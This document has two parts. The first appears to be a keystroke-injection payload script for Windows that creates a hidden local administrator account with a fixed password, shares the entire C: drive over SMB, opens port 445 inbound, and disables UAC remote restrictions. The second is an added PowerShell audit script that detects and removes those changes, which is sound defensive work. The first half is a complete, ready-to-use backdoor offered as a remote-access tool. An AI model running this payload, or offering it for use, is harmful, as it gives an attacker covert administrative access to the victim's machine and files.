Payload

REM #

REM # Title: "Microsoft Windows" SMB Backdoor


REM #
REM # Description:
REM # 1) Adds a local user account (OMG_User:OMG_P@ssW0rD).
REM # 2) Adds this local user to the local Administrators group.
REM # 3) Shares the "C:\" directory (OMG_SHARE) with FULL share permission for that user.
REM # 4) Adds an inbound firewall rule allowing TCP/445 (SMB) on every profile.
REM # 5) Sets "LocalAccountTokenFilterPolicy" to 1, which disables UAC remote
REM #    restrictions so the local account gets a full administrator token over
REM #    the network and can access "C:" through the share.
REM # 6) Hides this user account from the logon screen (Winlogon SpecialAccounts
REM #    UserList); "NET USER" still lists it.
REM #
REM # Author: TW-D
REM # Version: 1.0
REM # Category: Remote Access
REM # Target: Microsoft Windows
REM #
REM # TESTED ON
REM # ===============
REM # Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1)
REM # Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
REM #
REM # REQUIREMENTS
REM # ===============
REM # The target user must belong to the 'Administrators' group.
REM #

REM ######## INITIALIZATION ########

DELAY 1000
DUCKY_LANG US
DELAY 1000

REM ######## STAGE1 ########
REM # Open the Run dialog, launch cmd elevated (CTRL+SHIFT+ENTER), then answer
REM # the UAC consent prompt: LEFTARROW moves focus to "Yes", ENTER confirms.
REM # This only works because the logged-on user is already an administrator.

GUI r
DELAY 3000
STRING cmd
DELAY 1000
CTRL SHIFT ENTER
DELAY 3000
LEFTARROW
DELAY 5000
ENTER
DELAY 5000

REM ######## STAGE2 ########
REM # Create the backdoor account and make it a local administrator.

STRING NET USER OMG_User OMG_P@ssW0rD /ADD
ENTER
DELAY 1500

STRING NET LOCALGROUP Administrators OMG_User /ADD
ENTER
DELAY 1500

REM ######## STAGE3 ########
REM # Export the whole system drive over SMB and open TCP/445 inbound on all profiles.

STRING NET SHARE OMG_SHARE=C:\ /GRANT:OMG_User,FULL /REMARK:"OMG Remote Share"
ENTER
DELAY 1500

STRING NETSH ADVFIREWALL FIREWALL ADD RULE NAME="Server Message Block for OMG" PROTOCOL=TCP LOCALPORT=445 DIR=IN ACTION=ALLOW PROFILE=PUBLIC,PRIVATE,DOMAIN
ENTER
DELAY 1500

REM ######## STAGE4 ########
REM # Disable UAC remote restrictions for local accounts, then hide the account from the logon screen.

STRING REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /f /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1
ENTER
DELAY 1500

STRING REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /f /v OMG_User /t REG_DWORD /d 0
ENTER
DELAY 1500

REM ######## FINISH ########

STRING EXIT
ENTER
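
The audit script below is an added example, not part of the payload above or of TW-D's work. It hunts for the six artifacts the payload leaves on a host (hidden logon account, hidden account holding local admin, a non-administrative share of a drive root, an ad hoc inbound allow rule for TCP/445, and LocalAccountTokenFilterPolicy=1) without keying on the OMG_* names, since an operator changes those in seconds. It assumes an elevated PowerShell 5.1 session on Windows 10 with the LocalAccounts, SmbShare and NetSecurity modules present (all stock on the tested builds). The -Remediate switch is my own addition: it demotes and disables a hidden admin account rather than deleting it, so the profile and event trail survive for forensics.

```powershell
<#
  Added audit script (example code, not the original payload).
  Run from an elevated PowerShell 5.1 session on the suspected host.
  -Remediate undoes the payload's changes; the account is disabled and
  demoted, not deleted, to preserve evidence.
#>
[CmdletBinding()]
param([switch]$Remediate)

$findings = New-Object System.Collections.Generic.List[string]

# 6) Accounts hidden from the logon screen: a REG_DWORD 0 named after the
#    account under Winlogon\SpecialAccounts\UserList. A stock workstation
#    does not have this key at all, so any entry deserves a look.
$userListKey = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList'
$hidden = @()
if (Test-Path $userListKey) {
    foreach ($p in (Get-ItemProperty -Path $userListKey).PSObject.Properties) {
        if ($p.Name -notlike 'PS*' -and $p.Value -eq 0) { $hidden += $p.Name }
    }
}
foreach ($name in $hidden) { $findings.Add("Account hidden from logon screen: $name") }

# 1)+2) Local accounts in Administrators; a hidden one is the payload's signature.
$localAdmins = Get-LocalGroupMember -Group 'Administrators' |
    Where-Object { $_.ObjectClass -eq 'User' -and $_.PrincipalSource -eq 'Local' } |
    ForEach-Object { $_.Name.Split('\')[-1] }
$hiddenAdmins = @($localAdmins | Where-Object { $hidden -contains $_ })
foreach ($name in $hiddenAdmins) { $findings.Add("Hidden account holds local admin: $name") }

# 3) Non-administrative shares exporting a drive root (C$ and friends end in '$').
$rootShares = @(Get-SmbShare | Where-Object { $_.Name -notlike '*$' -and $_.Path -match '^[A-Za-z]:\\?$' })
foreach ($s in $rootShares) { $findings.Add("Drive root shared as '$($s.Name)' -> $($s.Path)") }

# 4) Inbound allow rules for TCP/445 added ad hoc. Built-in SMB rules belong to
#    a rule group (File and Printer Sharing); a rule added with netsh has none.
$smbRules = @(Get-NetFirewallRule -Direction Inbound -Action Allow -Enabled True |
    Where-Object {
        $pf = $_ | Get-NetFirewallPortFilter
        $pf.Protocol -eq 'TCP' -and ($pf.LocalPort -contains '445') -and -not $_.Group
    })
foreach ($r in $smbRules) { $findings.Add("Ad hoc inbound allow for TCP/445: '$($r.DisplayName)' ($($r.Profile))") }

# 5) LocalAccountTokenFilterPolicy=1 turns off UAC remote restrictions, so a
#    local admin authenticating over SMB gets a full, unfiltered token.
$policyKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
$latfp = (Get-ItemProperty -Path $policyKey -Name LocalAccountTokenFilterPolicy -ErrorAction SilentlyContinue).LocalAccountTokenFilterPolicy
if ($latfp -eq 1) { $findings.Add('LocalAccountTokenFilterPolicy=1 (UAC remote restrictions disabled)') }

if ($findings.Count -eq 0) { Write-Output 'No payload artifacts found.'; return }
$findings | ForEach-Object { Write-Output "[!] $_" }

if ($Remediate) {
    foreach ($name in $hiddenAdmins) {
        Remove-LocalGroupMember -Group 'Administrators' -Member $name
        Disable-LocalUser -Name $name
        Remove-ItemProperty -Path $userListKey -Name $name
    }
    foreach ($s in $rootShares) { Remove-SmbShare -Name $s.Name -Force }
    foreach ($r in $smbRules) { Remove-NetFirewallRule -Name $r.Name }
    if ($latfp -eq 1) { Remove-ItemProperty -Path $policyKey -Name LocalAccountTokenFilterPolicy }
    Write-Output 'Remediated. Check the Security log (4720, 4732, 5142) for when it happened.'
}
```

Each check is deliberately broader than the payload's literal values: any hidden account, any drive-root share, any groupless allow rule on 445. Hidden accounts that are not local admins are reported but left alone under -Remediate, since hiding a non-privileged account is unusual but not by itself a compromise; the Security log event IDs named in the output (4720 user created, 4732 added to a local group, 5142 share created) give the timeline of the keystroke injection.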
